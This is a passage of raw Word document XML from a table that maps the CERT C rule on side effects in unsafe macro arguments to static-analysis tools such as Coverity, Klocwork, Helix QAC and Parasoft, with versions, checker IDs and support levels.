                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.SE.INC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B89EE9" w14:textId="1D4F57CD" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Function-Like Macro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Side Effects in Expression with Decrement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Side Effects in Expression with Increment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="3BB86DFA" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFD7F47" w14:textId="7027F2DB" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId92" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Coverity</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5708A640" w14:textId="5E69ACCC" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2017.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DECED4" w14:textId="68E09800" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ASSERT_SIDE_EFFECTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5454F3" w14:textId="77777777" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C52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Partially implemented</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BB14BDE" w14:textId="574BD407" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Can detect the specific instance where assertion contains an operation/function call that may have a side effect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="7E6C136C" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D5FD0A2" w14:textId="353656C9" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId93" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>ECLAIR</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD3B543" w14:textId="69F52543" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DDA016" w14:textId="2717DD03" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CC2.EXP31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CC2.PRE31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C53302D" w14:textId="19E52C23" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="69EDFD68" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133217B7" w14:textId="7785C1B9" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId94" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C4762A" w14:textId="1C7D3945" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6AFABE" w14:textId="77777777" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">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C3462, C3463, C</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3464,C</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3465,C3466,C3467</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F5E2F4" w14:textId="35220EC2" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C++3225, C++3226, C++3227, C++3228, C++3229 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E107F3C" w14:textId="0199A1A7" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="674E5D71" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1F6C19" w14:textId="5CD6E403" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId95" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5282FBCF" w14:textId="105710C1" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0603104A" w14:textId="351B6218" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PORTING.VAR.EFFECTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E94A36D" w14:textId="6652391B" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="345BADEC" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4463B7E1" w14:textId="06B383E8" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId96" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409207EF" w14:textId="10C062DF" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D472375" w14:textId="247B79E4" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9 S, 562 S, 572 S, 35 D, 1 Q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D280BDA" w14:textId="04FB21C5" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="13CC4077" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="642C6635" w14:textId="2D3CD77B" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId97" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1659F964" w14:textId="6FC27EF9" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C127A7" w14:textId="4C8F6893" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-PRE31-b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-PRE31-c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-PRE31-d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511AFF98" w14:textId="36B3F647" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Assertions should not contain assignments, increment, or decrement operators</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Assertions should not contain function calls nor function-like macro calls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Avoid side effects in arguments to unsafe macros</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="31776F75" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DD1CB55" w14:textId="4642E8C3" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId98" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PC-lint Plus</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147234E7" w14:textId="5D9891A7" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C643E28" w14:textId="67441706" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>666, 2666</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB1863C" w14:textId="7FA39674" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="70B30499" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
